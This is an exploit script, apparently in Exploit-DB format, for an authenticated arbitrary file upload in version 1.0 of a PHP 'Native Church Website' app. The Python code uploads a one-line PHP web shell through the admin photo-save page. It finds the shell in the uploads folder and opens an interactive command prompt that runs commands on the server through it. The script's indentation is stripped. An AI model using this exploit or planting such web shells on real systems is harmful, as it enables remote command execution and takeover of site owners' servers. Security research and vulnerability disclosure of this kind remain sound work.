# Exploit Title: Native Church Website - Arbitrary File Upload (Authenticated)
# Date: 04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/11764/native-church-website-phpmysql.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4
#/usr/bin/python3
import requests
import re
from requests.models import ReadTimeoutError
import sys
s = requests.Session()
TARGET = "192.168.1.207" # <<< CHANGE ME
UPLOADS_URL = f"http://{TARGET}/native/admin/save-photo.php"
GALLERY_URL = f"http://{TARGET}/native/uploads/"
def get(url):
r = s.get(url)
return r.text
def banner():
ban = """ _______ __ __
\ \ ____/ \ / \ ______ ______
/ | \_/ ___\ \/\/ / \____ \/ ___/
/ | \ \___\ / | |_> >___ \
\____|__ /\___ >\__/\ / /\ | __/____ >
\/ \/ \/ \/ |__| \/
"""
return ban
def uploadShell():
data = (
('file', ("file.php", "<?php system($_GET['c']);?>")),
('caption', (None, 'simprevshell')),
)
r = s.post(UPLOADS_URL, files=data)
if r.status_code == 200:
return True
else:
return False
def getLink(page):
matchObj = re.findall("href=\"(.*?).php\"", page)
return matchObj
def testURL(url):
r = s.get(url)
return r.status_code
def getUploadLink(uploads):
if len(NEW_UPLOADS) > 1:
for l in NEW_UPLOADS:
link = f"{GALLERY_URL}{l}.php"
if testURL(link) == 200:
return link
uploadShell()
# Get upload link.
NEW_UPLOADS=getLink(get(GALLERY_URL))
shellUrl = getUploadLink(NEW_UPLOADS)
print("\033[34;1m" + banner() + "\033[0m")
print("\033[37m" + "Created by: Richard Jones aka Ac1d" +"\033[0m")
#Run webshell.
while True:
print()
try:
cmd = input("\033[91mac1d\033[0m>")
if cmd == "exit":
sys.exit()
r = s.get(f"{shellUrl}?c={cmd}", verify=False)
if r.status_code == 200:
print(r.text)
else:
raise Exception
except KeyboardInterrupt:
sys.exit()